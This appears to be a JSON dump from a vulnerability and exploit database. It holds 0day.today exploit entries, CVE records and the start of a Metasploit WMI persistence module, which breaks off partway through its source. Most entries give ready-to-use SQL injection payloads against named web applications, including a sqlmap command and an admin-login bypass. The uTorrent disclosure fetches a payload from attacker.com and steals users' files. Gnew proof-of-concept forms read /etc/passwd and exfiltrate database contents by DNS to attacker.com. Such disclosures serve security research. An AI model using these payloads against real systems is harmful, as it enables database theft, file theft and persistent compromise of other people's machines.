{"zdt": [{"lastseen": "2019-03-26T01:12:29", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-03-25T00:00:00", "published": "2019-03-25T00:00:00", "id": "1337DAY-ID-32421", "href": "https://0day.today/exploit/description/32421", "title": "Zeeways Jobsite CMS - id SQL Injection Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Zeeways Jobsite CMS - 'id' SQL Injection\r\n# Exploit Author: Ahmet \u00dcmit BAYRAM\r\n# Vendor Homepage: http://www.zeeways.com/jobsite-cms/1/productdetail\r\n# Demo Site: http://www.zeewayscms.com/jobsite/\r\n# Version: Lastest\r\n# Tested on: Kali Linux\r\n# CVE: N/A\r\n\r\n----- PoC 1: SQLi -----\r\n\r\nRequest: http://localhost/[PATH]/news_details.php?id=1\r\nVulnerable Parameter: id (GET)\r\nPayload: id=-5236\" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN\r\n(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING\r\nMIN(0)#\r\n\r\n----- PoC 2: SQLi -----\r\n\r\nRequest: http://localhost/[PATH]/jobs_details.php?id=1\r\nVulnerable Parameter: id (GET)\r\nPayload: id=-5236\" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN\r\n(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING\r\nMIN(0)#\r\n\r\n----- PoC 3: SQLi -----\r\n\r\nRequest: http://localhost/[PATH]/job_cmp_details.php?id=1\r\nVulnerable Parameter: id (GET)\r\nPayload: id=-5236\" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN\r\n(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING\r\nMIN(0)#\n\n# 0day.today [2019-03-25] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32421"}, {"lastseen": "2018-03-13T23:22:08", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category remote exploits", "modified": "2018-02-20T00:00:00", "published": "2018-02-20T00:00:00", "href": "https://0day.today/exploit/description/29857", "id": "1337DAY-ID-29857", "title": "utorrent - JSON-RPC Remote Code Execution / Information Disclosure Vulnerabilities", "type": "zdt", "sourceData": "By default, utorrent create an HTTP RPC server on port 10000 (uTorrent classic) or 19575 (uTorrent web). There are numerous problems with these RPC servers that can be exploited by any website using XMLHTTPRequest(). To be clear, visiting *any* website is enough to compromise these applications.\r\n \r\n \r\nuTorrent web (http://web.utorrent.com)\r\n======================================\r\n \r\nAs the name suggests, uTorrent Web uses a web interface and is controlled by a browser as opposed to the desktop application. By default, uTorrent web is configured to startup with Windows, so will always be running and accessible. For authentication, a random token is generated and stored in a configuration file which must be passed as a URL parameter with all requests. When you click the uTorrent tray icon, a browser window is opened with the authentication token populated, it looks like this:\r\n \r\nhttp://127.0.0.1:19575/gui/index.html?localauth=localapic3cfe21229a80938:\r\n \r\nWhile not a particularly strong secret (8 bytes of std::random_device), it at least would make remote attacks non-trivial. Unfortunately however, the authentication secret is stored inside the webroot (wtf!?!?!?!), so you can just fetch the secret and gain complete control of the service.\r\n \r\n$ curl -si http://localhost:19575/users.conf\r\nHTTP/1.1 200 OK\r\nDate: Wed, 31 Jan 2018 19:46:44 GMT\r\nLast-Modified: Wed, 31 Jan 2018 19:37:50 GMT\r\nEtag: \"5a721b0e.92\"\r\nContent-Type: text/plain\r\nContent-Length: 92\r\nConnection: close\r\nAccept-Ranges: bytes\r\n \r\nlocalapi29c802274dc61fb4 bc676961df0f684b13adae450a57a91cd3d92c03 94bc897965398c8a07ff 2 1\r\n \r\nThis requires some simple dns rebinding to attack remotely, but once you have the secret you can just change the directory torrents are saved to, and then download any file anywhere writable. For example:\r\n \r\n# change the download directory to the Startup folder.\r\nhttp://127.0.0.1:19575/gui/?localauth=token:&action=setsetting&s=dir_active_download&v=C:/Users/All%20Users/Start%20Menu/Programs/Startup\r\n \r\n# download a torrent containing calc.exe\r\nhttp://127.0.0.1:19575/gui/?localauth=token:&action=add-url&url=http://attacker.com/calc.exe.torrent\r\n \r\nI wrote a working exploit for this attack, available here:\r\n \r\nhttp://lock.cmpxchg8b.com/Moer0kae.html\r\n \r\nThe authentication secret is not the only data accessible within the webroot - settings, crashdumps, logs and other data is also accessible. As this is a complete remote compromise of the default uTorrent web configuration, I didn't bother looking any further after finding this.\r\n \r\nuTorrent Classic (https://www.utorrent.com/downloads/win)\r\n=========================================================\r\n \r\nBy default utorrent Classic creates a JSON RPC server on port 10000, it's not clear to me that this was intentionally exposed to the web, as many endpoints crash or interfere with the UI. Here are some example actions that websites can take:\r\n \r\nhttp://lock.cmpxchg8b.com/utorrent-crash-test.html\r\n \r\nNevertheless, browsing through the available endpoints I noticed that the /proxy/ handler is enabled and exposed by default, and allows any website to enumerate and copy any files you've downloaded. To be clear, any website you visit can read and copy every torrent you've downloaded. This works with the default configuration.\r\n \r\nThis requires brute forcing the \"sid\" which is a small integer that is incremented once for each torrent, this can be brute forced in seconds.\r\n \r\ne.g.\r\n \r\n$ curl -sI 'http://localhost:10000/proxy/0/?sid=2&file=0&callback=file'\r\nHTTP/1.1 200 OK\r\nContent-Type: audio/mpeg\r\nServer: BitTorrentProxy/1.0\r\nConnection: close\r\nAccept-Ranges: bytes\r\nETag: \"8FD54C339FE8B8A418CE2299AF2EADD9B1715D7A\"\r\n \r\nfile is the index in a multi-file torrent (here there is just one file) and callback is a javascript callback. This means any website can find out what you've downloaded, and then just copy it from you - all the data.\r\n \r\nI made a simple demo, screenshot of how it's supposed to look attached. It's really slow, but demonstrates that a website can enumerate and read any data you've downloaded via uTorrent.\r\n \r\n \r\nhttp://lock.cmpxchg8b.com/Ahg8Aesh.html\r\n \r\nHere is how I reproduced:\r\n \r\n* On a fresh Windows 7 VM, install utorrent 3.5 (44294). Accept all default settings.\r\n* File -> Add torrent from URL..., enter https://archive.org/download/SKODAOCTAVIA336x280/SKODAOCTAVIA336x280_archive.torrent\r\n* When the torrent is finished (it's only about 5MB), visit this URL in Chrome: http://lock.cmpxchg8b.com/Ahg8Aesh.html\r\n* Click \"Start Attack\"\r\n* Wait a few minutes.\r\n \r\nThe page should have figured out the size and file type, and gives an option to steal the files. See screenshot attached.\r\n \r\n----------\r\n \r\nThe utorrent binary disables ASLR and /GS. This is a really bad idea. (Note that the binary is UPX packed, but this doesn't change any security properties).\r\n \r\n----------\r\n \r\nI noticed that utorrent is using unmodified mersenne twister to generate authentication tokens and cookies, session identifiers, pairing keys, and so on. The PRNG is seeded with GetProcessId(), GetTickCount() etc. That is already not great quality seed data, but mersenne twister makes no guarantees that someone who can view sample output can't reconstruct the state of the PRNG.\r\n \r\nThis is actually one of the FAQs on the mersenne twister site:\r\n \r\nhttp://www.math.sci.hiroshima-u.ac.jp/~m-mat/MT/efaq.html\r\n \r\nThis allows anyone to reconstruct things like pairing keys, webui session cookies, etc, etc. You can sample unlimited prng output, so this is a serious design flaw.\r\n \r\n----------\r\n \r\nFinally, a minor issue - the documentation for the \"guest\" account feature says many actions are disabled for security, but I tested it and that it plain isn't true:\r\n \r\n$ curl -si 'http://[email\u00a0protected]:10000/gui/?action=getsettings&callback=error&btapp='\r\nHTTP/1.1 200 OK\r\nConnection: keep-alive\r\nContent-Length: 16572\r\nContent-Type: text/javascript\r\nSet-Cookie: GUID=6yY1pkIHHMvvHo8tgOYu; path=/\r\nCache-Control: no-cache\r\n \r\n{\"build\":44090,\"settings\": [\r\n[\"install_modification_time\",0,\"0\",{\"access\":\"Y\"}]\r\n...\r\n \r\n \r\nPerhaps this got broken at some point, but this feature is web-accessible, so this should probably be fixed (or suitable warnings added). I can't imagine many users enabled this, but those that did probably expected the security boundaries described in the documentation to be enforced.\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29857"}, {"lastseen": "2018-01-03T13:06:21", "bulletinFamily": "exploit", "description": "SoftDatepro Dating Social Network version 1.3 suffers from a remote SQL injection vulnerability.", "modified": "2017-09-30T00:00:00", "published": "2017-09-30T00:00:00", "href": "https://0day.today/exploit/description/28684", "id": "1337DAY-ID-28684", "type": "zdt", "title": "SoftDatepro Dating Social Network 1.3 SQL Injection Vulnerability", "sourceData": "# # # # # \r\n# Exploit Title: SoftDatepro Dating Social Network 1.3 - SQL Injection\r\n# Dork: N/A\r\n# Date: 29.09.2017\r\n# Vendor Homepage: http://www.softdatepro.com/\r\n# Software Link: https://codecanyon.net/item/softdatepro-build-your-own-dating-social-network/3650044\r\n# Demo: http://demo.softdatepro.com/\r\n# Version: 1.3\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows an attacker to inject sql commands....\r\n# \r\n# Proof of Concept:\r\n# \r\n# http://localhost/[PATH]/viewprofile.php?profid=[SQL]\r\n# http://localhost/[PATH]/viewmessage.php?sender_id=[SQL]\r\n# \r\n# -263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)[email\u00a0protected]:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+-\r\n# \r\n# http://localhost/[PATH]/admin\r\n# \r\n# Email: 'or 1=1 or ''=' Pass: anything\r\n# \r\n# Etc..\r\n# # # # #\n\n# 0day.today [2018-01-03] #", "sourceHref": "https://0day.today/exploit/28684", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-03-31T15:38:12", "bulletinFamily": "exploit", "description": "Apache Impala versions 2.7.0 through 2.8.0 suffers from an information disclosure vulnerability. It was noticed that a malicious process impersonating an Impala daemon could cause Impala daemons to skip authentication checks when Kerberos is enabled (but TLS is not). If the malicious server responds with 'COMPLETE' before the SASL handshake has completed, the client will consider the handshake as completed even though no exchange of credentials has happened.", "modified": "2017-07-11T00:00:00", "published": "2017-07-11T00:00:00", "href": "https://0day.today/exploit/description/28113", "id": "1337DAY-ID-28113", "type": "zdt", "title": "Apache Impala 2.8.0 Authentication Bypass Vulnerability", "sourceData": "CVE-2017-5640 Apache Impala (incubating) Information Disclosure\r\n\r\nVersions Affected:\r\nApache Impala (incubating) 2.7.0 to 2.8.0\r\n\r\nDescription:\r\nIt was noticed that a malicious process impersonating an Impala daemon\r\ncould cause Impala daemons to skip authentication checks when Kerberos\r\nis enabled (but TLS is not). If the malicious server responds with\r\naCOMPLETEa before the SASL handshake has completed, the client will\r\nconsider the handshake as completed even though no exchange of\r\ncredentials has happened.\r\n\r\nMitigation:\r\nUsers of the affected versions should apply the following mitigation:\r\nUpgrade to Apache Impala (incubating) 2.9.0\r\n\r\nCredit:\r\nThis issue was identified by the Cloudera Security team.\r\n\r\nReferences:\r\nhttps://issues.apache.org/jira/browse/IMPALA-5005\n\n# 0day.today [2018-03-31] #", "sourceHref": "https://0day.today/exploit/28113", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-09T03:25:09", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-04-05T00:00:00", "published": "2017-04-05T00:00:00", "href": "https://0day.today/exploit/description/27522", "id": "1337DAY-ID-27522", "title": "WordPress Car Rental System v2.5 Plugin - SQL Injection Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Car Rental System v2.5\r\n# Exploit Author: TAD GROUP\r\n# Vendor Homepage: https://www.bestsoftinc.com/\r\n# Software Link: https://www.bestsoftinc.com/car-rental-system.html\r\n# Version: 2.5\r\n# Contact: [email\u00a0protected]\r\n# Website: https://tad.bg <https://tad.bg>\r\n# Category: Web Application Exploits\r\n\r\n1. Description\r\n\r\nAn unescaped parameter was found in Car Rental System v2.5 (WP plugin). An attacker can exploit this vulnerability to read from the database.\r\nThe POST parameters 'pickuploc', 'dropoffloc', and 'car_type' are vulnerable.\r\n\r\n2. Proof of concept\r\n\r\nsqlmap -u \"http://example.com/wp-car/\" \u2014data=\"pickuploc=2&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=\" --dbs --threads=5 --random-agent\r\n\r\nParameter: pickuploc (POST)\r\n Type: boolean-based blind\r\n Title: AND boolean-based blind - WHERE or HAVING clause\r\n Payload: pickuploc=2 AND 3834=3834&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=\r\n\r\n Type: AND/OR time-based blind\r\n Title: MySQL >= 5.0.12 AND time-based blind\r\n Payload: pickuploc=2 AND SLEEP(5)&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=\r\n\r\nThe same is applicable for 'dropoffloc' and 'car_type' parameters\r\n\r\n\r\n3. Attack outcome:\r\n\r\nAn attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.\r\n\r\n4. Impact\r\n\r\nCritical\r\n\r\n5. Affected versions\r\n\r\n<= 2.5\r\n\r\n6. Disclosure timeline\r\n\r\n13-Mar-2017 - found the vulnerability\r\n13-Mar-2017 - informed the developer\r\n28-Mar-2017 - release date of this security advisory\r\n\r\nNot fixed at the date of submitting this exploit.\n\n# 0day.today [2018-02-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/27522"}, {"lastseen": "2018-03-20T11:17:18", "bulletinFamily": "exploit", "description": "Gnew version 2013.1 suffers from file inclusion and remote SQL injection vulnerabilities.", "modified": "2013-10-02T00:00:00", "published": "2013-10-02T00:00:00", "id": "1337DAY-ID-21318", "href": "https://0day.today/exploit/description/21318", "type": "zdt", "title": "Gnew 2013.1 - Multiple Vulnerabilities", "sourceData": "Product: Gnew\r\nVulnerable Version(s): 2013.1 and probably prior\r\nTested Version: 2013.1\r\nAdvisory Publication: August 28, 2013 [without technical details]\r\nVendor Notification: August 28, 2013\r\nPublic Disclosure: October 2, 2013\r\nVulnerability Type: PHP File Inclusion [CWE-98], SQL Injection [CWE-89]\r\nCVE References: CVE-2013-5639, CVE-2013-5640\r\nRisk Level: High\r\nCVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\nSolution Status: Solution Available\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )\r\n \r\n------------------------------------------------------------------------\r\n-----------------------\r\n \r\nAdvisory Details:\r\n \r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Gnew, which can be exploited to execute arbitrary PHP code and pefrom SQL injection attacks against vulnerable application.\r\n \r\n1) PHP File Inclusion in Gnew: CVE-2013-5639\r\n \r\nVulnerability exists due to insufficient validation of user-supplied input passed via the \"gnew_language\" cookie to \"/users/login.php\" script before using it in \"include()\" function. A remote attacker can include and execute arbitrary local files on a vulnerable system via directory traversal sequence and URL-encoded NULL byte.\r\n \r\nThe following exploitation example below displays content of the \"/etc/passwd\" file:\r\n \r\nGET /users/login.php HTTP/1.1\r\nCookie: gnew_language=../../../etc/passwd%00;\r\n \r\n2) SQL Injection in Gnew: CVE-2013-5640\r\n \r\n2.1 The vulnerability exists due to insufficient filtration of \"friend_email\" HTTP POST parameter passed to \"/news/send.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n \r\nThe following exploitation example sends MySQL server version and database username to email address \"attacker (at) mail (dot) com [email concealed]\":\r\n \r\n<form action=\"http://[host]/news/send.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"send\" value=\"1\">\r\n<input type=\"hidden\" name=\"user_name\" value=\"username\">\r\n<input type=\"hidden\" name=\"user_email\" value=\"user (at) mail (dot) com [email concealed]\">\r\n<input type=\"hidden\" name=\"friend_email\" value=\"attacker (at) mail (dot) com [email concealed]\">\r\n<input type=\"hidden\" name=\"news_id\" value=\"-1' UNION SELECT version(),user() -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n \r\n2.2 The vulnerability exists due to insufficient filtration of \"user_email\" HTTP POST parameter passed to \"/users/register.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n \r\nThe exploitation example below outputs database username and MySQL server version into file \"/var/www/file.txt\". Successful exploitation requires that MySQL server has write access to the \"/var/www\" directory.\r\n \r\n<form action=\"http://[host]/users/register.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"register\" value=\"1\">\r\n<input type=\"hidden\" name=\"user_email\" value=\"' UNION SELECT user(),version() INTO OUTFILE '/var/www/file.txt' -- 2\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n \r\n2.3 The vulnerability exists due to insufficient filtration of \"answer_id\" HTTP POST parameter passed to \"/polls/vote.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n \r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n \r\n<form action=\"http://[host]/polls/vote.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"add_vote\" value=\"1\">\r\n<input type=\"hidden\" name=\"answer_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(\r\n107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),\r\nCHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"hidden\" name=\"question_id\" value=\"1\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n \r\n2.4 The vulnerability exists due to insufficient filtration of \"question_id\" HTTP POST parameter passed to \"/polls/vote.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n \r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n \r\n<form action=\"http://[host]/polls/vote.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"add_vote\" value=\"1\">\r\n<input type=\"hidden\" name=\"answer_id\" value=\"1\">\r\n<input type=\"hidden\" name=\"question_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(\r\n107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),\r\nCHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n \r\n2.5 The vulnerability exists due to insufficient filtration of \"story_id\" HTTP POST parameter passed to \"/comments/add.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n \r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n \r\n<form action=\"http://[host]/comments/add.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"add\" value=\"1\">\r\n<input type=\"hidden\" name=\"preview\" value=\"1\">\r\n<input type=\"hidden\" name=\"comment_subject\" value=\"1\">\r\n<input type=\"hidden\" name=\"comment_text\" value=\"1\">\r\n<input type=\"hidden\" name=\"story_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(\r\n107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),\r\nCHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n \r\n2.6 The vulnerability exists due to insufficient filtration of \"story_id\" HTTP POST parameter passed to \"/comments/edit.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n \r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n \r\n<form action=\"http://[host]/comments/edit.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"edit\" value=\"1\">\r\n<input type=\"hidden\" name=\"preview_edited\" value=\"1\">\r\n<input type=\"hidden\" name=\"comment_subject\" value=\"1\">\r\n<input type=\"hidden\" name=\"comment_text\" value=\"1\">\r\n<input type=\"hidden\" name=\"story_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(\r\n107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),\r\nCHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n \r\n2.7 The vulnerability exists due to insufficient filtration of \"thread_id\" HTTP POST parameter passed to \"/posts/add.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n \r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n \r\n<form action=\"http://[host]/posts/add.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"add\" value=\"1\">\r\n<input type=\"hidden\" name=\"preview\" value=\"1\">\r\n<input type=\"hidden\" name=\"thread_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(\r\n107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),\r\nCHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n \r\n2.8 The vulnerability exists due to insufficient filtration of \"thread_id\" HTTP POST parameter passed to \"/posts/edit.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n \r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n \r\n<form action=\"http://[host]/posts/edit.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"edit\" value=\"1\">\r\n<input type=\"hidden\" name=\"preview_edited\" value=\"1\">\r\n<input type=\"hidden\" name=\"thread_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(\r\n107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),\r\nCHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n \r\nSuccessful exploitation of vulnerabilities 2.3-2.8 requires that attacker is registered and logged-in. Registration is opened by default.\r\n \r\nVulnerabilities 2.1, 2.2 and 2.8 were discovered by Gjoko Krstic: http://packetstormsecurity.com/files/122771 on July 23, 2013. High-Tech Bridge Research Lab has discovered these vulnerabilities independently and publishes them as since the Vendor notification date they remain unpatched.\n\n# 0day.today [2018-03-20] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21318"}], "cve": [{"lastseen": "2019-05-29T18:17:08", "bulletinFamily": "NVD", "description": "It was noticed that a malicious process impersonating an Impala daemon in Apache Impala (incubating) 2.7.0 to 2.8.0 could cause Impala daemons to skip authentication checks when Kerberos is enabled (but TLS is not). If the malicious server responds with 'COMPLETE' before the SASL handshake has completed, the client will consider the handshake as completed even though no exchange of credentials has happened.", "modified": "2017-07-17T16:13:00", "id": "CVE-2017-5640", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5640", "published": "2017-07-10T20:29:00", "title": "CVE-2017-5640", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:13:05", "bulletinFamily": "NVD", "description": "Multiple SQL injection vulnerabilities in Gnew 2013.1 allow remote attackers to execute arbitrary SQL commands via the (1) answer_id or (2) question_id parameter to polls/vote.php, (3) story_id parameter to comments/add.php or (4) comments/edit.php, or (5) thread_id parameter to posts/add.php. NOTE: this issue was SPLIT due to differences in researchers and disclosure dates. CVE-2013-7349 already covers the news_id parameter to news/send.php, user_email parameter to users/register.php, and thread_id to posts/edit.php vectors.", "modified": "2016-12-31T02:59:00", "id": "CVE-2013-5640", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5640", "published": "2014-04-01T03:24:00", "title": "CVE-2013-5640", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2019-12-04T08:49:02", "bulletinFamily": "exploit", "description": "This module will create a permanent WMI event subscription to achieve file-less persistence using one of five methods. The EVENT method will create an event filter that will query the event log for an EVENT_ID_TRIGGER (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing must be enabled on the target for this method to work, this can be enabled using \"auditpol.exe /set /subcategory:Logon /failure:Enable\"). When these criteria are met a command line event consumer will trigger an encoded powershell payload. The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL. The LOGON method will create an event filter that will trigger the payload after the system has an uptime of 4 minutes. The PROCESS method will create an event filter that triggers the payload when the specified process is started. The WAITFOR method creates an event filter that utilizes the Microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER before executing the payload. The signal can be sent from a windows host on a LAN utilizing the waitfor.exe command (note: requires target to have port 445 open). Additionally a custom command can be specified to run once the trigger is activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a high integrity process. It is also recommended not to use stageless payloads due to powershell script length limitations.\n", "modified": "2017-09-14T02:03:34", "published": "2017-06-05T16:44:37", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/WMI_PERSISTENCE", "href": "", "type": "metasploit", "title": "WMI Event Subscription Persistence", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/powershell'\nrequire 'msf/core/post/windows/powershell'\nrequire 'msf/core/post/file'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::Windows::Powershell\n include Msf::Exploit::Powershell\n include Post::Windows::Priv\n include Msf::Post::File\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'WMI Event Subscription Persistence',\n 'Description' => %q{\n This module will create a permanent WMI event subscription to achieve file-less persistence using one\n of five methods. The EVENT method will create an event filter that will query the event log for an EVENT_ID_TRIGGER\n (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing\n must be enabled on the target for this method to work, this can be enabled using \"auditpol.exe /set /subcategory:Logon\n /failure:Enable\"). When these criteria are met a command line event consumer will trigger an encoded powershell payload.\n The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL. The LOGON\n method will create an event filter that will trigger the payload after the system has an uptime of 4 minutes. The PROCESS\n method will create an event filter that triggers the payload when the specified process is started. The WAITFOR method\n creates an event filter that utilizes the Microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER\n before executing the payload. The signal can be sent from a windows host on a LAN utilizing the waitfor.exe command\n (note: requires target to have port 445 open). Additionally a custom command can be specified to run once the trigger is\n activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a\n high integrity process. It is also recommended not to use stageless payloads due to powershell script length limitations.\n },\n 'Author' => ['Nick Tyrer <@NickTyrer>'],\n 'License' => MSF_LICENSE,\n 'Privileged' => true,\n 'Platform' => 'win',\n 'SessionTypes' => ['meterpreter'],\n 'Targets' => [['Windows', {}]],\n 'DisclosureDate' => 'Jun 6 2017',\n 'DefaultTarget' => 0,\n 